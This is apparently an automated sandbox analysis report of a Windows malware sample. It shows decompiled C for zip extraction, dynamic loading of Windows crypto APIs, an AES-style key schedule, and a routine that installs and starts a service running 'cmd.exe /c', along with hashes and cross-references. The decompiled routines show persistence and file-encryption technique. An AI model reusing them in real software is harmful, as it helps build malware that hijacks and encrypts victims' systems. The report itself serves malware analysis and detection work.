			E00406C40(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				unsigned int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				char _t142;
				char _t150;
				void* _t151;
				signed char _t156;
				long _t173;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				unsigned int _t210;
				char _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				void* _t263;
				unsigned int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				char* _t274;
				unsigned int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;
				intOrPtr _t282;

				_t263 = __edx;
				_t213 = __ecx;
				_t272 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t272 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t272 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E00406A97(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t272 !=  *((intOrPtr*)(_t280 + 0x134))) {
					if(_t272 != _t208) {
						_t132 =  *_t280;
						if(_t272 >=  *( *_t280 + 0x10)) {
							L12:
							_t133 =  *_t280;
							if( *( *_t280 + 0x10) >= _t272) {
								E004064BB( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								if(L0040657A(_t213, _t263,  *_t280,  &_v44,  &_v20,  &_v16) == 0) {
									_t142 = E00405D0E( *((intOrPtr*)( *_t280)), _v20, 0);
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L00407700();
									_v12 = _t142;
									if(L00405D8A(_t142, 1, _v16,  *((intOrPtr*)( *_t280))) == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t209 = __imp___mbsstr;
										_t274 =  &_v644;
										while(1) {
											L21:
											_t150 =  *_t274;
											if(_t150 != 0 && _t274[1] == 0x3a) {
												break;
											}
											if(_t150 == 0x5c || _t150 == 0x2f) {
												_t274 =  &(_t274[1]);
												continue;
											} else {
												_t151 =  *_t209(_t274, "\\..\\");
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 =  *_t209(_t274, "\\../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/../");
												if(_t151 != 0) {
													goto L31;
												}
												_t151 =  *_t209(_t274, "/..\\");
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t264 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t264 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t264 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													_t210 = 1;
													if(_t276 == 0 || _t276 == 7 || _t276 == 0xb || _t276 == 0xe) {
														_a11 = _t264 >> 0x00000001 & 0x00000001;
														_t230 = _t264 & 0x00000001;
														_v5 = _t264 >> 0x00000002 & 0x00000001;
														_t156 = _t264 >> 0x00000004 & 0x00000001;
														_t264 = _t264 >> 0x00000005 & 0x00000001;
														_t210 = _t264;
													}
													_t277 = 0;
													 *(_t281 + 0x108) = 0;
													if(_t156 != 0) {
														 *(_t281 + 0x108) = 0x10;
													}
													if(_t210 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
													}
													if(_a11 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
													}
													if(_t230 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
													}
													if(_v5 != 0) {
														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
													}
													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
													_v40.dwHighDateTime = _t264;
													LocalFileTimeToFileTime( &_v40,  &_v32);
													_t173 = _v32.dwLowDateTime;
													_t234 = _v32.dwHighDateTime;
													_t212 = _v12;
													 *(_t281 + 0x10c) = _t173;
													 *(_t281 + 0x114) = _t173;
													 *(_t281 + 0x11c) = _t173;
													 *(_t281 + 0x110) = _t234;
													 *(_t281 + 0x118) = _t234;
													 *(_t281 + 0x120) = _t234;
													if(_v16 <= 4) {
														L57:
														if(_t212 != 0) {
															_push(_t212);
															L004076E8();
														}
														_t282 = _v24;
														memcpy(_t282 + 8, _t281, 0x12c);
														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
														goto L60;
													} else {
														while(1) {
															_v12 =  *((intOrPtr*)(_t277 + _t212));
															_v10 = _v10 & 0x00000000;
															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
															if(strcmp( &_v12, "UT") == 0) {
																break;
															}
															_t277 = _t277 + _a8 + 4;
															if(_t277 + 4 < _v16) {
																continue;
															}
															goto L57;
														}
														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
														_t185 = _t238 >> 0x00000001 & 0x00000001;
														_t278 = _t277 + 5;
														_a11 = _t185;
														_v5 = _t238 >> 0x00000002 & 0x00000001;
														if((_t238 & 0x00000001) != 0) {
															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t194 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
															_t185 = _a11;
															 *(_t281 + 0x120) = _t271;
														}
														if(_t185 != 0) {
															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
															_t190 = _t278 + _t212;
															_t278 = _t278 + 4;
															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
															 *(_t281 + 0x110) = _t270;
														}
														if(_v5 != 0) {
															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
															 *(_t281 + 0x118) = _t269;
														}
														goto L57;
													}
												}
												goto L31;
											}
										}
										_t274 =  &(_t274[2]);
										goto L21;
									}
									_push(_v12);
									L004076E8();
									goto L19;
								}
								return 0x700;
							}
							E00406520(_t133);
							L11:
							_pop(_t213);
							goto L12;
						}
						E004064E2(_t213, _t132);
						goto L11;
					}
					goto L8;
				} else {
					if(_t272 == _t208) {
						L8:
						_t204 = _a8;
						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
						 *((char*)(_t204 + 4)) = 0;
						 *((intOrPtr*)(_t204 + 0x108)) = 0;
						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
						 *((intOrPtr*)(_t204 + 0x110)) = 0;
						 *((intOrPtr*)(_t204 + 0x114)) = 0;
						 *((intOrPtr*)(_t204 + 0x118)) = 0;
						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
						 *((intOrPtr*)(_t204 + 0x120)) = 0;
						 *((intOrPtr*)(_t204 + 0x124)) = 0;
						 *((intOrPtr*)(_t204 + 0x128)) = 0;
						L60:
						return 0;
					}
					memcpy(_a8, _t280 + 8, 0x12c);
					goto L60;
				}
			}

0x00406c40
0x00406c40
0x00406c4c
0x00406c4f
0x00406c52
0x00406c56
0x00406c59
0x00407064
0x00000000
0x00407064
0x00406c5f
0x00406c64
0x00000000
0x00000000
0x00406c6d
0x00406c70
0x00406c75
0x00406c75
0x00406c7c
0x00406c7f
0x00406ca0
0x00406cec
0x00406cf1
0x00406cfa
0x00406cfa
0x00406cff
0x00406d21
0x00406d3e
0x00406d52
0x00406d5c
0x00406d89
0x00000000
0x00406d89
0x00406d5e
0x00406d61
0x00406d68
0x00406d7e
0x00406d95
0x00406d9b
0x00406dab
0x00406db0
0x00406db8
0x00406dbe
0x00406dbe
0x00406dbe
0x00406dc2
0x00000000
0x00000000
0x00406dd0
0x00406dd6
0x00000000
0x00406dd9
0x00406ddf
0x00406de5
0x00406e11
0x00406e11
0x00406e11
0x00000000
0x00406e11
0x00406ded
0x00406df3
0x00000000
0x00000000
0x00406dfb
0x00406e01
0x00000000
0x00000000
0x00406e09
0x00406e0f
0x00406e1b
0x00406e20
0x00406e28
0x00406e2c
0x00406e3c
0x00406e3e
0x00406e41
0x00406e44
0x00406e46
0x00406e61
0x00406e6b
0x00406e6d
0x00406e78
0x00406e7a
0x00406e7c
0x00406e7c
0x00406e7e
0x00406e82
0x00406e88
0x00406e8a
0x00406e8a
0x00406e96
0x00406e98
0x00406e98
0x00406ea3
0x00406ea5
0x00406ea5
0x00406eae
0x00406eb0
0x00406eb0
0x00406ebb
0x00406ebd
0x00406ebd
0x00406eca
0x00406ed3
0x00406ee6
0x00406ef2
0x00406ef5
0x00406efb
0x00406efe
0x00406f05
0x00406f08
0x00406f0e
0x00406f14
0x00406f1a
0x00406f20
0x00406f26
0x00406f2c
0x00407037
0x00407039
0x0040703b
0x0040703c
0x00407041
0x00407048
0x0040704f
0x0040705a
0x00000000
0x00406f32
0x00406f32
0x00406f3a
0x00406f41
0x00406f45
0x00406f4d
0x00406f5d
0x00000000
0x00000000
0x00406f62
0x00406f6c
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f73
0x00406f81
0x00406f86
0x00406f89
0x00406f8f
0x00406f92
0x00406f94
0x00406f99
0x00406f9e
0x00406fba
0x00406fc0
0x00406fc4
0x00406fc4
0x00406fcc
0x00406fce
0x00406fd3
0x00406fd8
0x00406ff4
0x00406ffb
0x00406ffb
0x00407005
0x00407007
0x0040702a
0x00407031
0x00407031
0x00000000
0x00407005
0x00406f2c
0x00000000
0x00406e0f
0x00406dd0
0x00406dcb
0x00000000
0x00406dcb
0x00406d80
0x00406d83
0x00000000
0x00406d88
0x00000000
0x00406d40
0x00406d02
0x00406cf9
0x00406cf9
0x00000000
0x00406cf9
0x00406cf4
0x00000000
0x00406cf4
0x00000000
0x00406c81
0x00406c83
0x00406ca2
0x00406ca7
0x00406caa
0x00406cae
0x00406cb1
0x00406cb7
0x00406cbd
0x00406cc3
0x00406cc9
0x00406ccf
0x00406cd5
0x00406cdb
0x00406ce1
0x00407060
0x00000000
0x00407060
0x00406c91
0x00000000
0x00406c96

APIs

memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91

Strings

/..\, xrefs: 00406E03
/../, xrefs: 00406DF5
\..\, xrefs: 00406DD9
\../, xrefs: 00406DE7

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: memcpy
String ID: /../$/..\$\../$\..\
API String ID: 3510742995-3885502717
Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401A45 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401A45() {
				void* _t1;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t11;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;

				_t15 =  *0x40f894; // 0x0
				if(_t15 != 0) {
					L8:
					_t1 = 1;
					return _t1;
				}
				_t11 = LoadLibraryA("advapi32.dll");
				if(_t11 == 0) {
					L9:
					return 0;
				}
				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
				_t9 = GetProcAddress(_t11, "CryptGenKey");
				_t17 =  *0x40f894; // 0x0
				 *0x40f8a8 = _t9;
				if(_t17 == 0) {
					goto L9;
				}
				_t18 =  *0x40f898; // 0x0
				if(_t18 == 0) {
					goto L9;
				}
				_t19 =  *0x40f89c; // 0x0
				if(_t19 == 0) {
					goto L9;
				}
				_t20 =  *0x40f8a0; // 0x0
				if(_t20 == 0) {
					goto L9;
				}
				_t21 =  *0x40f8a4; // 0x0
				if(_t21 == 0 || _t9 == 0) {
					goto L9;
				} else {
					goto L8;
				}
			}

0x00401a48
0x00401a4f
0x00401aec
0x00401aee
0x00000000
0x00401aee
0x00401a60
0x00401a64
0x00401af1
0x00000000
0x00401af1
0x00401a7f
0x00401a8c
0x00401a99
0x00401aa6
0x00401ab3
0x00401ab8
0x00401aba
0x00401ac0
0x00401ac6
0x00000000
0x00000000
0x00401ac8
0x00401ace
0x00000000
0x00000000
0x00401ad0
0x00401ad6
0x00000000
0x00000000
0x00401ad8
0x00401ade
0x00000000
0x00000000
0x00401ae0
0x00401ae6
0x00000000
0x00000000
0x00000000
0x00000000

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8

Strings

advapi32.dll, xrefs: 00401A55
CryptDestroyKey, xrefs: 00401A86
CryptImportKey, xrefs: 00401A79
CryptDecrypt, xrefs: 00401AA0
CryptGenKey, xrefs: 00401AAD
CryptEncrypt, xrefs: 00401A93
CryptAcquireContextA, xrefs: 00401A71

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
API String ID: 2238633743-2459060434
Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401CE8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CE8(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v1040;
				void* _t12;
				void* _t13;
				void* _t31;
				int _t32;

				_v12 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_v8 = _t12;
				if(_t12 != 0) {
					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
					_v16 = _t13;
					if(_t13 == 0) {
						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
						if(_t31 != 0) {
							StartServiceA(_t31, 0, 0);
							CloseServiceHandle(_t31);
							_v12 = 1;
						}
						_t32 = _v12;
					} else {
						StartServiceA(_t13, 0, 0);
						CloseServiceHandle(_v16);
						_t32 = 1;
					}
					CloseServiceHandle(_v8);
					return _t32;
				}
				return 0;
			}

0x00401cfb
0x00401cfe
0x00401d06
0x00401d09
0x00401d21
0x00401d29
0x00401d2c
0x00401d54
0x00401d7b
0x00401d7f
0x00401d84
0x00401d8b
0x00401d91
0x00401d91
0x00401d98
0x00401d2e
0x00401d31
0x00401d3a
0x00401d42
0x00401d42
0x00401d9e
0x00000000
0x00401da7
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
CloseServiceHandle.ADVAPI32(?), ref: 00401D9E

Strings

cmd.exe /c "%s", xrefs: 00401D4E

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$ManagerStart
String ID: cmd.exe /c "%s"
API String ID: 1485051382-955883872
Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

0x00402a83
0x00402a85
0x00402a8e
0x00402a95
0x00402a9e
0x00402aa3
0x00402aa4
0x00402aa4
0x00402aa9
0x00402aae
0x00402ab1
0x00402ab4
0x00402ac2
0x00402ac6
0x00402acd
0x00402ad6
0x00402adb
0x00402adc
0x00402adc
0x00402ae1
0x00402ae6
0x00402af4
0x00402af8
0x00402aff
0x00402b05
0x00402b08
0x00402b0d
0x00402b0e
0x00402b0e
0x00402b14
0x00402b23
0x00402b2a
0x00402b3f
0x00402b44
0x00402b4a
0x00402b4f
0x00402b75
0x00402b7d
0x00402b92
0x00402b7f
0x00402b81
0x00402b81
0x00000000
0x00402b51
0x00402b53
0x00402b70
0x00402b94
0x00402b94
0x00402b9a
0x00402ba2
0x00402ba3
0x00402ba6
0x00402bae
0x00402bb1
0x00402bcf
0x00402bcf
0x00402bd7
0x00402bf8
0x00402c00
0x00402c01
0x00402c0b
0x00402c0e
0x00402c12
0x00402c15
0x00402c17
0x00402c1f
0x00402c22
0x00402c4e
0x00402c4e
0x00402c54
0x00402ca5
0x00402ca8
0x00402e04
0x00402e06
0x00402e0d
0x00402e10
0x00402e73
0x00402e73
0x00402e7b
0x00402e7b
0x00402e18
0x00402e1b
0x00402e1b
0x00402e20
0x00000000
0x00000000
0x00402e22
0x00402e25
0x00402e25
0x00402e29
0x00402e59
0x00402e5b
0x00402e5e
0x00402e5e
0x00402e61
0x00402e61
0x00402e64
0x00402e68
0x00402e6b
0x00000000
0x00402e1b
0x00402cae
0x00402cb5
0x00402cb5
0x00402cbf
0x00402d05
0x00402d0b
0x00402d11
0x00402d34
0x00402d3a
0x00402d3b
0x00402d3e
0x00402d40
0x00402d43
0x00402d43
0x00402d46
0x00402d4e
0x00402d8f
0x00402d95
0x00402d9b
0x00402d9c
0x00402d9f
0x00402da1
0x00402da4
0x00402da4
0x00402da7
0x00402da7
0x00402dad
0x00000000
0x00000000
0x00402daf
0x00402db5
0x00402dbf
0x00402dc3
0x00402dc8
0x00402dc9
0x00402dcf
0x00402ddb
0x00402dde
0x00402de4
0x00402de6
0x00402de9
0x00402dec
0x00402df3
